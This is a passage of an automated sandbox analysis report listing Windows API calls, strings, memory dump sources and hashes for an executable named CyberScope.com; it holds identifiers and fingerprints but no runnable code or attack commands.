                                                                                    • Opcode Fuzzy Hash: 74731d49d620a9fed459c7631d3518fc4969b969b25b2182fb5fb5af077b22d7
                                                                                    • Instruction Fuzzy Hash: FF41277290021CBEDB10DBA4CD85AEEBBB8EF59704F004095FA55B7180DB706F85CB61
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com,00000104), ref: 001C1AD9
                                                                                    • _free.LIBCMT ref: 001C1BA4
                                                                                    • _free.LIBCMT ref: 001C1BAE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com
                                                                                    • API String ID: 2506810119-1102183622
                                                                                    • Opcode ID: 9229aa6a2f3e60d624667578cfb809ce6537106e50669bab692da5279514d101
                                                                                    • Instruction ID: 884de7f0822435bf8b7b676fdec7207e34793446bcb45b7e44661ca0e1088440
                                                                                    • Opcode Fuzzy Hash: 9229aa6a2f3e60d624667578cfb809ce6537106e50669bab692da5279514d101
                                                                                    • Instruction Fuzzy Hash: 51316671A80618FFCB21DB95DC85E9EBBFCEFA5710B1441AAE80497211E770CE45DB90
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001FCBB1
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 001FCBF7
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002629C0,012B5F08), ref: 001FCC40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                    • String ID: 0
                                                                                    • API String ID: 135850232-4108050209
                                                                                    • Opcode ID: d3322f3f95b97a3c2f019719523d8b4ebc19bceb99e813c999507e50990e9f94
                                                                                    • Instruction ID: f88f280b5ec1cb316ce1f9864f3c23e3f02c67df67547121357aed56ec71d004
                                                                                    • Opcode Fuzzy Hash: d3322f3f95b97a3c2f019719523d8b4ebc19bceb99e813c999507e50990e9f94
                                                                                    • Instruction Fuzzy Hash: 6341E37120430A9FD720DF24DA85B6ABBE8EF85714F044A1DF6A997291C730E904DB92
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0022DCD0,00000000,?,?,?,?), ref: 00224F48
                                                                                    • GetWindowLongW.USER32 ref: 00224F65
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00224F75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: a93f674fe9b3ed1bdab37e1c1b305086eb96faf6bf0a0f0be0b524d90512dea4
                                                                                    • Instruction ID: ab73b78b4dea57109a702c24f05b4419c41ad99bed6696cb27b0f2c57c4a1f78
                                                                                    • Opcode Fuzzy Hash: a93f674fe9b3ed1bdab37e1c1b305086eb96faf6bf0a0f0be0b524d90512dea4
                                                                                    • Instruction Fuzzy Hash: E031CF31220216BFDF209EB8EC45BEA77A9EB49334F204715F975A21E0C770AC608B50
                                                                                    APIs
                                                                                      • Part of subcall function 00213DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00213AD4,?,?), ref: 00213DD5
                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00213AD7
                                                                                    • _wcslen.LIBCMT ref: 00213AF8
                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00213B63
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 946324512-2422070025
                                                                                    • Opcode ID: 89b80e328a134ec16b288db684e0ce2887ea0b93d9831f82675dc3ef932ae328
                                                                                    • Instruction ID: c577cf53e3ee2b5f38553a25e8943e8800ef0868a648978825dfa1f585a1d446
                                                                                    • Opcode Fuzzy Hash: 89b80e328a134ec16b288db684e0ce2887ea0b93d9831f82675dc3ef932ae328
                                                                                    • Instruction Fuzzy Hash: EB31A6396182029FCB10CF68C585EE977E2EF25328F248159E8168B392E771EF95C760
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002249DC
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002249F0
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00224A14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 703784e2001f8dbcf4d1b521f7244a7af0164aee3bdd3c48383654631bfc1924
                                                                                    • Instruction ID: cf9f41d14bcd0a857783650eabdf25601c2c4bbcf2e4ef8a28295c77411383e2
                                                                                    • Opcode Fuzzy Hash: 703784e2001f8dbcf4d1b521f7244a7af0164aee3bdd3c48383654631bfc1924
                                                                                    • Instruction Fuzzy Hash: 4621B132520229BBDF11DF90DC46FEB3B69EF48724F110214FE156B1D0D6B1A8A59B90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002251A3
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002251B1
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002251B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: b9eda2c194b1b9b5aeaafeb63640bcfc5d11de9f70429bc8431774c789a78fec
                                                                                    • Instruction ID: 815eed94b934b118a500b10d96d3486bc09b8185ecbfc0aaeb10fa3f6e642571
                                                                                    • Opcode Fuzzy Hash: b9eda2c194b1b9b5aeaafeb63640bcfc5d11de9f70429bc8431774c789a78fec
                                                                                    • Instruction Fuzzy Hash: B021B0B5610629BFDB10CF58EC85DB737ADEF5A364B004049F9049B3A1CB70EC21CAA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002242DC
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002242EC
                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00224312
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 8c4a09a4f9672ca68a8e71fa82d683ee27db261b376104fc3ba3743effb6ddf5
                                                                                    • Instruction ID: 7f40dc6e99059db1576bccbf14a187d5a4261723db6185b7b0ffd19e355abcfa
                                                                                    • Opcode Fuzzy Hash: 8c4a09a4f9672ca68a8e71fa82d683ee27db261b376104fc3ba3743effb6ddf5
                                                                                    • Instruction Fuzzy Hash: C121C532620129BBDF11DFD5EC85FAF376EEF89754F118214F9009B190C6719C6287A0
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0020544D
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002054A1
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,0022DCD0), ref: 00205515
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                    • String ID: %lu
                                                                                    • API String ID: 2507767853-685833217
                                                                                    • Opcode ID: 1a335ac57b110b7c284b42287d2352ff55b02630d8fb92d22bdc6492dd5d93b5
                                                                                    • Instruction ID: 9d1373f2de124368621e948fe392b6224fe0b2932bc97f97d8352a129515a5e8
                                                                                    • Opcode Fuzzy Hash: 1a335ac57b110b7c284b42287d2352ff55b02630d8fb92d22bdc6492dd5d93b5
                                                                                    • Instruction Fuzzy Hash: C1317370A00209AFDB10DF54C885EAA7BF9EF05304F1440A5F809DB262DB71EE45CB61
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 00228339
                                                                                    • EnumChildWindows.USER32(?,0022802F,00000000), ref: 002283B0
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                    • String ID: (&$(&
                                                                                    • API String ID: 3814560230-2921098048
                                                                                    • Opcode ID: 63024f21b0534aa6a77d24d55bd906b518ec40fada943c028566b1c8c474b511
                                                                                    • Instruction ID: 663e046424f46547fc8051a3a4614c9b4515a234b118ad388b2fc9880cdff7ee
                                                                                    • Opcode Fuzzy Hash: 63024f21b0534aa6a77d24d55bd906b518ec40fada943c028566b1c8c474b511
                                                                                    • Instruction Fuzzy Hash: 96214F34112611EFC724CF68E844A9677F5FB49720F204659F875873A0DBB0A855CB50
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00224CED
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00224D02
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00224D0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 04cebddd7a2c6c83cafa981a996a72630cfc290b67dd7bd4d9cb5c91c03c6788
                                                                                    • Instruction ID: 07aa2d740d9ba93f5942f14b5b874c7b275fc3b6a6c07a53784f6cff8f4ba146
                                                                                    • Opcode Fuzzy Hash: 04cebddd7a2c6c83cafa981a996a72630cfc290b67dd7bd4d9cb5c91c03c6788
                                                                                    • Instruction Fuzzy Hash: 6F113A31250248BEEF205FA9DC06FAB37A8EF85754F110114FE41E20A0C2B1DC208B10
                                                                                    APIs
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                      • Part of subcall function 001F36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001F3712
                                                                                      • Part of subcall function 001F36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 001F3723
                                                                                      • Part of subcall function 001F36F4: GetCurrentThreadId.KERNEL32 ref: 001F372A
                                                                                      • Part of subcall function 001F36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001F3731
                                                                                    • GetFocus.USER32 ref: 001F38C4
                                                                                      • Part of subcall function 001F373B: GetParent.USER32(00000000), ref: 001F3746
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001F390F
                                                                                    • EnumChildWindows.USER32(?,001F3987), ref: 001F3937
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 1272988791-1110647743
                                                                                    • Opcode ID: ac9ea23df9fccd160c7305153094b49aef0d2fc53701bdd769d30665fb06db15
                                                                                    • Instruction ID: 7bf3dbeeba67ba62b4401941971309bd911eb80dfa728fb2d1c0a614c8bcdb8d
                                                                                    • Opcode Fuzzy Hash: ac9ea23df9fccd160c7305153094b49aef0d2fc53701bdd769d30665fb06db15
                                                                                    • Instruction Fuzzy Hash: FD11DD716002096BDF11BF749C85AFD77A9AFA4314F044075FE199B252DF705A0ACB30
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(?), ref: 00195A34
                                                                                    • DestroyWindow.USER32(?,001937B8,?,?,?,?,?,00193709,?,?), ref: 00195A91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteDestroyObjectWindow
                                                                                    • String ID: <)&$<)&
                                                                                    • API String ID: 2587070983-149397641
                                                                                    • Opcode ID: 16e00b0cc44720b276ec58c48f9d260a5816a8d9d068f93da4e227518251cba1
                                                                                    • Instruction ID: 8082b0f2de3368e0fdac27b7261d3ad23f659a83effe1f4257162d3d1ec4b0ab
                                                                                    • Opcode Fuzzy Hash: 16e00b0cc44720b276ec58c48f9d260a5816a8d9d068f93da4e227518251cba1
                                                                                    • Instruction Fuzzy Hash: 7A21EA34617E11CFEF19DB29F89CB2533E2BB94311F258159E806AB2B1CBB49C48CB15
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00226360
                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0022638D
                                                                                    • DrawMenuBar.USER32(?), ref: 0022639C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                    • String ID: 0
                                                                                    • API String ID: 3227129158-4108050209
                                                                                    • Opcode ID: 84503b235538970e0a37ec8dbe03c264da2435bb2061291cebbfe97bb9962a55
                                                                                    • Instruction ID: 1ad2687fe66de90deced3c416fc452a4367c33e2211e30af9a27021b7aacc728
                                                                                    • Opcode Fuzzy Hash: 84503b235538970e0a37ec8dbe03c264da2435bb2061291cebbfe97bb9962a55
                                                                                    • Instruction Fuzzy Hash: 7101C432520224BFDB219F94EC88BEE7BB4FF45710F108099F409D6150CB748A91EF20
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,002628E0,0022AD55,000000FC,?,00000000,00000000,?), ref: 0022823F
                                                                                    • GetFocus.USER32 ref: 00228247
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                      • Part of subcall function 00192234: GetWindowLongW.USER32(?,000000EB), ref: 00192242
                                                                                    • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002282B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                                                    • String ID: (&
                                                                                    • API String ID: 3601265619-1801568203
                                                                                    • Opcode ID: 62405f003ff635166c3a6835d1a82e1f30b74992e31f4a363e9d2ba1843ee2b4
                                                                                    • Instruction ID: 2f2ec8621df93f8dfd7e0c55c92e6020692cb020d7ed60cc5ed8e4ba22d5af42
                                                                                    • Opcode Fuzzy Hash: 62405f003ff635166c3a6835d1a82e1f30b74992e31f4a363e9d2ba1843ee2b4
                                                                                    • Instruction Fuzzy Hash: AA017531603951EFC725DFB8E858A6533E6EB89320F244269E416872A0CF31AC6BCB50
                                                                                    APIs
                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 00228576
                                                                                    • CreateAcceleratorTableW.USER32(00000000,?,?,?,0020BE96,00000000,00000000,?,00000001,00000002), ref: 0022858C
                                                                                    • GetForegroundWindow.USER32(?,0020BE96,00000000,00000000,?,00000001,00000002), ref: 00228595
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                    • String ID: (&
                                                                                    • API String ID: 986409557-1801568203
                                                                                    • Opcode ID: 738e71111c9fa52370eb6c810d4fb421f603b84dfcee645aba363ec2197a6857
                                                                                    • Instruction ID: 0afe18dddc3bf0ae43aaa4b767aafb65bcf8591e861c4643c86f4c5cec990446
                                                                                    • Opcode Fuzzy Hash: 738e71111c9fa52370eb6c810d4fb421f603b84dfcee645aba363ec2197a6857
                                                                                    • Instruction Fuzzy Hash: 0E012D30612B15EFCB249FA8FC88A6577A1FB54361F61851DF511972B0DB70E9B8CB40
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00264038,0026407C), ref: 00228C1A
                                                                                    • CloseHandle.KERNEL32 ref: 00228C2C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: 8@&$|@&
                                                                                    • API String ID: 3712363035-402032422
                                                                                    • Opcode ID: a380845d30e8158f6f79e40e3cc29e61c7fb31917dc418bbf9d5e6fe768b6cde
